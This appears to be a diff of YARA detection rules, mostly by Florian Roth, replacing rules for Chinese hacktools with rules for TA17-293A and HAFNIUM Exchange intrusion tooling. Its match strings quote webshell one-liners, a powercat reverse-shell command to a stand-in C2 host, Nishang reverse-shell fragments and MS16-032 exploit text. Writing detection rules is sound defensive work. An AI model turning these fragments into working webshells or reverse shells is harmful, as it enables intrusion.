+rule SIGNATURE_BASE_TA17_293A_Hacktool_PS_1 : FILE
 {
 	meta:
-		description = "Chinese Hacktool Set - file MarathonTool.exe"
+		description = "Auto-generated rule"
 		author = "Florian Roth (Nextron Systems)"
-		id = "23513361-ecac-5ddb-92b9-4dd8da12e8db"
-		date = "2015-06-13"
+		id = "e4b92536-fa9a-5a65-8bd6-84c037dfbdce"
+		date = "2017-10-21"
 		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L69-L84"
+		reference = "https://www.us-cert.gov/ncas/alerts/TA17-293A"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_ta17_293A.yar#L152-L166"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "084a27cd3404554cc799d0e689f65880e10b59e3"
-		logic_hash = "2d52d640ef44d933791d1da0d1263dba15702180c730500e04d364dd6b4d6081"
+		logic_hash = "a59834684cc1e7a34eeb8fb7f6cd1c414d6eab3ae58c6df763b2ec548705b371"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "72a28efb6e32e653b656ca32ccd44b3111145a695f6f6161965deebbdc437076"
 
 	strings:
-		$s0 = "MarathonTool" ascii
-		$s17 = "/Blind SQL injection tool based in heavy queries" fullword ascii
-		$s18 = "SELECT UNICODE(SUBSTRING((system_user),{0},1))" fullword wide
+		$x1 = "$HashFormat = '$krb5tgs$23$*ID#124_DISTINGUISHED NAME: CN=fakesvc,OU=Service,OU=Accounts,OU=EnterpriseObjects,DC=asdf,DC=pd,DC=f" ascii
+		$x2 = "} | Where-Object {$_.SamAccountName -notmatch 'krbtgt'} | Get-SPNTicket @GetSPNTicketArguments" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 1040KB and all of them
+		( filesize < 80KB and 1 of them )
 }
-rule SIGNATURE_BASE_PLUGIN_Trackid : FILE
+rule SIGNATURE_BASE_TA17_293A_Hacktool_Touch_MAC_Modification : FILE
 {
 	meta:
-		description = "Chinese Hacktool Set - file TracKid.dll"
+		description = "Auto-generated rule"
 		author = "Florian Roth (Nextron Systems)"
-		id = "8dd77df1-748e-5778-be40-38b794c74b97"
-		date = "2015-06-13"
+		id = "69240cc0-a04e-544a-b7e3-c5a08c062055"
+		date = "2017-10-21"
 		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L86-L104"
+		reference = "https://www.us-cert.gov/ncas/alerts/TA17-293A"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_ta17_293A.yar#L168-L184"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "a114181b334e850d4b33e9be2794f5bb0eb59a09"
-		logic_hash = "a62112dbf2ef696e4eb7f6787a0e0930c29d9834f46c87493954498fa4b375f6"
+		logic_hash = "5f4c6b653d1b6f4427c6582513d3c19cb8d580e669260a1afda01eecf8ce3bfc"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "070d7082a5abe1112615877214ec82241fd17e5bd465e24d794a470f699af88e"
 
 	strings:
-		$s0 = "E-mail: cracker_prince@163.com" fullword ascii
-		$s1 = ".\\TracKid Log\\%s.txt" fullword ascii
-		$s2 = "Coded by prince" fullword ascii
-		$s3 = "TracKid.dll" fullword ascii
-		$s4 = ".\\TracKid Log" fullword ascii
-		$s5 = "%08x -- %s" fullword ascii
+		$s1 = "-t time - use the time specified to update the access and modification times" fullword ascii
+		$s2 = "Failed to set file times for %s. Error: %x" fullword ascii
+		$s3 = "touch [-acm][ -r ref_file | -t time] file..." fullword ascii
+		$s4 = "-m - change the modification time only" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 200KB and 3 of them
+		( uint16( 0 ) == 0x5a4d and filesize < 100KB and 1 of them )
 }
-rule SIGNATURE_BASE_Pc_Pc2015 : FILE
+rule SIGNATURE_BASE_TA17_293A_Hacktool_Exploit_MS16_032 : FILE
 {
 	meta:
-		description = "Chinese Hacktool Set - file pc2015.exe"
+		description = "Auto-generated rule"
 		author = "Florian Roth (Nextron Systems)"
-		id = "aa7c0b5e-91c3-52cc-9e06-b4648d0b8825"
-		date = "2015-06-13"
+		id = "4c5838d7-9956-564e-a25c-f2ba5641ac03"
+		date = "2017-10-21"
 		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L106-L121"
+		reference = "https://www.us-cert.gov/ncas/alerts/TA17-293A"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_ta17_293A.yar#L186-L202"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "de4f098611ac9eece91b079050b2d0b23afe0bcb"
-		logic_hash = "34d66d8b9e637c067ec2d9387b7b57458312d75892e33b95eb1095200799cf3b"
+		logic_hash = "0f0bd4f8ae1e9689f111233ca8fdb9a9b6c20e526f22350c8204f64a54639dcd"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "9b97290300abb68fb48480718e6318ee2cdd4f099aa6438010fb2f44803e0b58"
 
 	strings:
-		$s0 = "\\svchost.exe" ascii
-		$s1 = "LON\\OD\\O-\\O)\\O%\\O!\\O=\\O9\\O5\\O1\\O" fullword ascii
-		$s8 = "%s%08x.001" fullword ascii
+		$x1 = "[?] Thread belongs to: $($(Get-Process -PID $([Kernel32]::GetProcessIdOfThread($Thread)))" ascii
+		$x2 = "0x00000002, \"C:\\Windows\\System32\\cmd.exe\", \"\"," fullword ascii
+		$x3 = "PowerShell implementation of MS16-032. The exploit targets all vulnerable" fullword ascii
+		$x4 = "If we can't open the process token it's a SYSTEM shell!" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 309KB and all of them
+		( filesize < 40KB and 1 of them )
 }
-rule SIGNATURE_BASE_Sekurlsa : FILE
+
+rule SIGNATURE_BASE_Imphash_UPX_Packed_Malware_1_TA17_293A : FILE
 {
 	meta:
-		description = "Chinese Hacktool Set - file sekurlsa.dll"
+		description = "Detects malware based on Imphash of malware used in TA17-293A"
 		author = "Florian Roth (Nextron Systems)"
-		id = "b65dc578-e5a1-57e6-bd98-2c45cd07e857"
-		date = "2015-06-13"
+		id = "3ff28f06-8b69-5e8f-ab45-dfa4f6e69812"
+		date = "2017-10-21"
 		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L123-L139"
+		reference = "https://www.us-cert.gov/ncas/alerts/TA17-293A"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_ta17_293A.yar#L206-L217"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "6acecd18fc7da1c5eb0d04e848aae9ce59d2b1b5"
-		logic_hash = "dea05c7f19a834cc936c452ca2f6f4286e6c3dae002747c27913960199451c3f"
+		logic_hash = "398ccbd5e492fb1efa80dc07900ef77611c4b5bab95f715fce7b5dbeb0aff49d"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-
-	strings:
-		$s1 = "Bienvenue dans un processus distant" fullword wide
-		$s2 = "Format d'appel invalide : addLogonSession [idSecAppHigh] idSecAppLow Utilisateur" wide
-		$s3 = "SECURITY\\Policy\\Secrets" fullword wide
-		$s4 = "Injection de donn" fullword wide
+		hash1 = "a278256fbf2f061cfded7fdd58feded6765fade730374c508adad89282f67d77"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 1150KB and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 5000KB and pe.imphash ( ) == "d7d745ea39c8c5b82d5e153d3313096c" )
 }
-rule SIGNATURE_BASE_Mysqlfast : FILE
+
+rule SIGNATURE_BASE_Imphash_Malware_2_TA17_293A : HIGHVOL FILE
 {
 	meta:
-		description = "Chinese Hacktool Set - file mysqlfast.exe"
+		description = "Detects malware based on Imphash of malware used in TA17-293A"
 		author = "Florian Roth (Nextron Systems)"
-		id = "93ee91cd-a6b8-5ed9-b750-779f88032be6"
-		date = "2015-06-13"
+		id = "5c9f32a3-8c50-5d46-929b-bbe14697540e"
+		date = "2017-10-21"
 		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L141-L159"
+		reference = "https://www.us-cert.gov/ncas/alerts/TA17-293A"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_ta17_293A.yar#L219-L229"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "32b60350390fe7024af7b4b8fbf50f13306c546f"
-		logic_hash = "3ea75954831e705d0d25efa115288e66868d9b814f0990fd048bbe1209a8d933"
+		logic_hash = "5f91c07a9cc65c31eb9fd09bdd2752bc285c5a4b118ffe647391f7d187765de4"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = "HIGHVOL, FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
-	strings:
-		$s2 = "Invalid password hash: %s" fullword ascii
-		$s3 = "-= MySql Hash Cracker =- " fullword ascii
-		$s4 = "Usage: %s hash" fullword ascii
-		$s5 = "Hash: %08lx%08lx" fullword ascii
-		$s6 = "Found pass: " fullword ascii
-		$s7 = "Pass not found" fullword ascii
-
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 900KB and 4 of them
+		( uint16( 0 ) == 0x5a4d and filesize < 5000KB and pe.imphash ( ) == "a8f69eb2cf9f30ea96961c86b4347282" )
 }
-rule SIGNATURE_BASE_Dtools2_02_Dtools : FILE
+rule SIGNATURE_BASE_WEBSHELL_ASP_Embedded_Mar21_1 : FILE
 {
 	meta:
-		description = "Chinese Hacktool Set - file DTools.exe"
+		description = "Detects ASP webshells"
 		author = "Florian Roth (Nextron Systems)"
-		id = "fc812797-12d8-596a-8ebe-dd8b0d7a4b7e"
-		date = "2015-06-13"
+		id = "7cf7db9d-8f8a-51db-a0e6-84748e8f9e1f"
+		date = "2021-03-05"
 		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L161-L179"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_hafnium.yar#L2-L16"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "9f99771427120d09ec7afa3b21a1cb9ed720af12"
-		logic_hash = "51e30d39f388546ac233b4b97a38f225c90d2f006bc509dd7eecfb408aef9be5"
-		score = 75
+		logic_hash = "4a8b4cea6f53dad9771cb694ec55f305f04dfdbd8e663154cad672ca414c138c"
+		score = 85
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "kernel32.dll" ascii
-		$s1 = "TSETPASSWORDFORM" fullword wide
-		$s2 = "TGETNTUSERNAMEFORM" fullword wide
-		$s3 = "TPORTFORM" fullword wide
-		$s4 = "ShellFold" fullword ascii
-		$s5 = "DefaultPHotLigh" fullword ascii
+		$s1 = "<script runat=\"server\">" nocase
+		$s2 = "new System.IO.StreamWriter(Request.Form["
+		$s3 = ".Write(Request.Form["
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 2000KB and all of them
+		filesize < 100KB and all of them
 }
-rule SIGNATURE_BASE_Dll_Packetx : FILE
+rule SIGNATURE_BASE_APT_WEBSHELL_HAFNIUM_Secchecker_Mar21_1 : FILE
 {
 	meta:
-		description = "Chinese Hacktool Set - file PacketX.dll - ActiveX wrapper for WinPcap packet capture library"
+		description = "Detects HAFNIUM SecChecker webshell"
 		author = "Florian Roth (Nextron Systems)"
-		id = "19ab5977-934d-5e3f-8bba-925bb57bf486"
-		date = "2015-06-13"
+		id = "73db3d78-7ece-53be-9efb-d19801993d5e"
+		date = "2021-03-05"
 		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L181-L196"
+		reference = "https://twitter.com/markus_neis/status/1367794681237667840"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_hafnium.yar#L18-L33"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "3f0908e0a38512d2a4fb05a824aa0f6cf3ba3b71"
-		logic_hash = "161d174376c599b1b794fa1174349ae12b198842d89769baec4b9664729a3983"
-		score = 50
+		logic_hash = "e0e4df860bdde7d5c277f596535c493d926095be6f46f6ba41b6177afbfc5cd9"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "b75f163ca9b9240bf4b37ad92bc7556b40a17e27c2b8ed5c8991385fe07d17d0"
 
 	strings:
-		$s9 = "[Failed to load winpcap packet.dll." wide
-		$s10 = "PacketX Version" wide
+		$x1 = "<%if(System.IO.File.Exists(\"c:\\\\program files (x86)\\\\fireeye\\\\xagt.exe" ascii
+		$x2 = "\\csfalconservice.exe\")){Response.Write( \"3\");}%></head>" ascii fullword
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 1920KB and all of them
+		uint16( 0 ) == 0x253c and filesize < 1KB and 1 of them or 2 of them
 }
-rule SIGNATURE_BASE_Sqldbx_Zhs : FILE
+rule SIGNATURE_BASE_APT_HAFNIUM_Forensic_Artefacts_Mar21_1
 {
 	meta:
-		description = "Chinese Hacktool Set - file SqlDbx_zhs.exe"
+		description = "Detects forensic artefacts found in HAFNIUM intrusions"
 		author = "Florian Roth (Nextron Systems)"
-		id = "31c49755-f1bd-5ecb-91ff-1040e40983ab"
-		date = "2015-06-13"
+		id = "872822b0-34d9-5ae4-a532-6a8786494fa9"
+		date = "2021-03-02"
 		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L198-L217"
+		reference = "https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_hafnium.yar#L35-L48"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "e34228345498a48d7f529dbdffcd919da2dea414"
-		logic_hash = "b0215d29c58c252c1717f08135eab65794a99ed669c2225bcba690ae7d7a034c"
+		logic_hash = "eb86595956092506c2e29373faaf39a3987f9feed36a53b191bedd498db05cbb"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = ""
 
 	strings:
-		$s0 = "S.failed_logins \"Failed Login Attempts\", " fullword ascii
-		$s7 = "SELECT ROLE, PASSWORD_REQUIRED FROM SYS.DBA_ROLES ORDER BY ROLE" fullword ascii
-		$s8 = "SELECT spid 'SPID', status 'Status', db_name (dbid) 'Database', loginame 'Login'" ascii
-		$s9 = "bcp.exe <:schema:>.<:table:> out \"<:file:>\" -n -S <:server:> -U <:user:> -P <:" ascii
-		$s11 = "L.login_policy_name AS \"Login Policy\", " fullword ascii
-		$s12 = "mailto:support@sqldbx.com" fullword ascii
-		$s15 = "S.last_login_time \"Last Login\", " fullword ascii
+		$s1 = "lsass.exe C:\\windows\\temp\\lsass" ascii wide fullword
+		$s2 = "c:\\ProgramData\\it.zip" ascii wide fullword
+		$s3 = "powercat.ps1'); powercat -c" ascii wide fullword
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 4 of them
+		1 of them
 }
-rule SIGNATURE_BASE_Ms10048_X86 : FILE
+rule SIGNATURE_BASE_APT_WEBSHELL_HAFNIUM_Chopper_Webshell : APT HAFNIUM WEBSHELL FILE
 {
 	meta:
-		description = "Chinese Hacktool Set - file ms10048-x86.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "373f0419-5a7d-5f01-968c-5d3e7b1c0670"
-		date = "2015-06-13"
+		description = "Detects Chopper WebShell Injection Variant (not only Hafnium related)"
+		author = "Markus Neis,Swisscom"
+		id = "25dcf166-4aea-5680-b161-c5fc8d74b987"
+		date = "2021-03-05"
 		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L219-L237"
+		reference = "https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_hafnium.yar#L50-L65"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "e57b453966e4827e2effa4e153f2923e7d058702"
-		logic_hash = "50e45cae87f5d1cc4903a16f9283dd751d90cde0c71f3124467b4ff15bd34f1b"
+		logic_hash = "c185a8da2a18fa59a8eeb36dbd95ba12c9c61717efc5f2d19d2d5b27ee243f2b"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "APT, HAFNIUM, WEBSHELL, FILE"
 
 	strings:
-		$s1 = "[ ] Resolving PsLookupProcessByProcessId" fullword ascii
-		$s2 = "The target is most likely patched." fullword ascii
-		$s3 = "Dojibiron by Ronald Huizer, (c) master@h4cker.us ." fullword ascii
-		$s4 = "[ ] Creating evil window" fullword ascii
-		$s5 = "%sHANDLEF_INDESTROY" fullword ascii
-		$s6 = "[+] Set to %d exploit half succeeded" fullword ascii
+		$x1 = "runat=\"server\">" nocase
+		$s1 = "<script language=\"JScript\" runat=\"server\">function Page_Load(){eval(Request" nocase
+		$s2 = "protected void Page_Load(object sender, EventArgs e){System.IO.StreamWriter sw = new System.IO.StreamWriter(Request.Form[\"p\"] , false, Encoding.Default);sw.Write(Request.Form[\"f\"]);"
+		$s3 = "<script language=\"JScript\" runat=\"server\"> function Page_Load(){eval (Request[\"" nocase
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 100KB and 4 of them
+		filesize < 10KB and $x1 and 1 of ( $s* )
 }
-rule SIGNATURE_BASE_Dos_Ch : FILE
+rule SIGNATURE_BASE_APT_WEBSHELL_Tiny_Webshell : APT HAFNIUM WEBSHELL FILE
 {
 	meta:
-		description = "Chinese Hacktool Set - file ch.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "2e8319de-fe54-5083-968c-4707d127f072"
-		date = "2015-06-13"
+		description = "Detects WebShell Injection"
+		author = "Markus Neis,Swisscom"
+		id = "aa2fcecc-4c8b-570d-a81a-5dfb16c04e05"
+		date = "2021-03-05"
 		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L239-L257"
+		reference = "https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_hafnium.yar#L67-L82"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "60bbb87b08af840f21536b313a76646e7c1f0ea7"
-		logic_hash = "49ab2c75267c2ed5c15c8fbdc6fa0f8826f6e7a45a2861d6ba4b293ffca6bcd6"
+		hash = "099c8625c58b315b6c11f5baeb859f4c"
+		logic_hash = "9309f9b57353b6fe292048d00794699a8637a3e6e429c562fb36c7e459003a3b"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "APT, HAFNIUM, WEBSHELL, FILE"
 
 	strings:
-		$s0 = "/Churraskito/-->Usage: Churraskito.exe \"command\" " fullword ascii
-		$s4 = "fuck,can't find WMI process PID." fullword ascii
-		$s5 = "/Churraskito/-->Found token %s " fullword ascii
-		$s8 = "wmiprvse.exe" fullword ascii
-		$s10 = "SELECT * FROM IIsWebInfo" fullword ascii
-		$s17 = "WinSta0\\Default" fullword ascii
+		$x1 = "<%@ Page Language=\"Jscript\" Debug=true%>"
+		$s1 = "=Request.Form(\""
+		$s2 = "eval("
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 260KB and 3 of them
+		filesize < 300 and all of ( $s* ) and $x1
 }
-rule SIGNATURE_BASE_Dubrute_Dubrute : FILE
+rule SIGNATURE_BASE_HKTL_PS1_Powercat_Mar21 : FILE
 {
 	meta:
-		description = "Chinese Hacktool Set - file DUBrute.exe"
+		description = "Detects PowerCat hacktool"
 		author = "Florian Roth (Nextron Systems)"
-		id = "10aa2017-d563-5953-8672-dbc13ff6b3cf"
-		date = "2015-06-13"
+		id = "ae3963e8-2fe9-5bc3-bf72-95f136622832"
+		date = "2021-03-02"
 		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L259-L275"
+		reference = "https://github.com/besimorhino/powercat"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_hafnium.yar#L84-L103"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "8aaae91791bf782c92b97c6e1b0f78fb2a9f3e65"
-		logic_hash = "1e6d8bd24a37e3f4b7de88989251ae904128ff1bf766d4a4408ff8990c6dfd2f"
+		logic_hash = "cbd5c6f7c5b4ed713482588ee4490a2326fe11cfaacfb3bfc6a6d94130a8bc83"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "c55672b5d2963969abe045fe75db52069d0300691d4f1f5923afeadf5353b9d2"
 
 	strings:
-		$s1 = "IP - %d; Login - %d; Password - %d; Combination - %d" fullword ascii
-		$s2 = "IP - 0; Login - 0; Password - 0; Combination - 0" fullword ascii
-		$s3 = "Create %d IP@Loginl;Password" fullword ascii
-		$s4 = "UBrute.com" fullword ascii
+		$x1 = "powercat -l -p 8000 -r dns:10.1.1.1:53:c2.example.com" ascii fullword
+		$x2 = "try{[byte[]]$ReturnedData = $Encoding.GetBytes((IEX $CommandToExecute 2>&1 | Out-String))}" ascii fullword
+		$s1 = "Returning Encoded Payload..." ascii
+		$s2 = "$CommandToExecute =" ascii fullword
+		$s3 = "[alias(\"Execute\")][string]$e=\"\"," ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 1020KB and all of them
+		uint16( 0 ) == 0x7566 and filesize < 200KB and 1 of ( $x* ) or 3 of them
 }
-rule SIGNATURE_BASE_Cookietools : FILE
+rule SIGNATURE_BASE_HKTL_Nishang_PS1_Invoke_Powershelltcponeline
 {
 	meta:
-		description = "Chinese Hacktool Set - file CookieTools.exe"
+		description = "Detects PowerShell Oneliner in Nishang's repository"
 		author = "Florian Roth (Nextron Systems)"
-		id = "893884e5-6f4c-5f67-9382-8bf1ee45a257"
-		date = "2015-06-13"
+		id = "0218ebbd-2dbe-5838-ab53-1e78e3f97b9e"
+		date = "2021-03-03"
 		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L277-L294"
+		reference = "https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcpOneLine.ps1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_hafnium.yar#L105-L119"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "b6a3727fe3d214f4fb03aa43fb2bc6fadc42c8be"
-		logic_hash = "7f8c59ef58a92db15d8965e54ed6e26834e268581581af2a0ff98a6f46564e7e"
+		logic_hash = "59622bff95de1077d26ee4547f37cd1045c0c1fc6817df40ff2564b33a962a07"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = ""
+		hash1 = "2f4c948974da341412ab742e14d8cdd33c1efa22b90135fcfae891f08494ac32"
 
 	strings:
-		$s0 = "http://210.73.64.88/doorway/cgi-bin/getclientip.asp?IP=" fullword ascii
-		$s2 = "No data to read.$Can not bind in port range (%d - %d)" fullword wide
-		$s3 = "Connection Closed Gracefully.;Could not bind socket. Address and port are alread" wide
-		$s8 = "OnGetPasswordP" fullword ascii
-		$s12 = "http://www.chinesehack.org/" ascii
+		$s1 = "=([text.encoding]::ASCII).GetBytes((iex $" ascii wide
+		$s2 = ".GetStream();[byte[]]$" ascii wide
+		$s3 = "New-Object Net.Sockets.TCPClient('" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 5000KB and 4 of them
+		all of them
 }
-rule SIGNATURE_BASE_Update_Pcinit : FILE
+rule SIGNATURE_BASE_WEBSHELL_ASPX_Simpleseesharp : WEBSHELL UNCLASSIFIED FILE
 {
 	meta:
-		description = "Chinese Hacktool Set - file PcInit.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "71c34049-97a2-5611-a081-21a85f8631d9"
-		date = "2015-06-13"
+		description = "A simple ASPX Webshell that allows an attacker to write further files to disk."
+		author = "threatintel@volexity.com"
+		id = "469fdf5c-e09e-5d44-a2e6-0864dcd0e18a"
+		date = "2021-03-01"
 		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L296-L314"
+		reference = "https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_hafnium.yar#L121-L136"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "a6facc4453f8cd81b8c18b3b3004fa4d8e2f5344"
-		logic_hash = "ee4b17dfb0d70464669edab1b7610efa607adb2918306ae6c50130024008a169"
+		hash = "893cd3583b49cb706b3e55ecb2ed0757b977a21f5c72e041392d1256f31166e2"
+		logic_hash = "6f62249a68bae94e5cbdb4319ea5cde9dc071ec7a4760df3aafe78bc1e072c30"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "WEBSHELL, UNCLASSIFIED, FILE"
 
 	strings:
-		$s1 = "\\svchost.exe" ascii
-		$s2 = "%s%08x.001" fullword ascii
-		$s3 = "Global\\ps%08x" fullword ascii
-		$s4 = "drivers\\" ascii
-		$s5 = "StrStrA" fullword ascii
-		$s6 = "StrToIntA" fullword ascii
+		$header = "<%@ Page Language=\"C#\" %>"
+		$body = "<% HttpPostedFile thisFile = Request.Files[0];thisFile.SaveAs(Path.Combine"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 50KB and all of them
+		$header at 0 and $body and filesize < 1KB
 }
-rule SIGNATURE_BASE_Dat_Nasllib : FILE
+rule SIGNATURE_BASE_WEBSHELL_CVE_2021_27065_Webshells : CVE_2021_27065 FILE
 {
 	meta:
-		description = "Chinese Hacktool Set - file NaslLib.dll"
-		author = "Florian Roth (Nextron Systems)"
-		id = "d5ce72a4-c2b0-50b2-85bb-acf0bfd354e0"
-		date = "2015-06-13"
+		description = "Detects web shells dropped by CVE-2021-27065. All actors, not specific to HAFNIUM. TLP:WHITE"
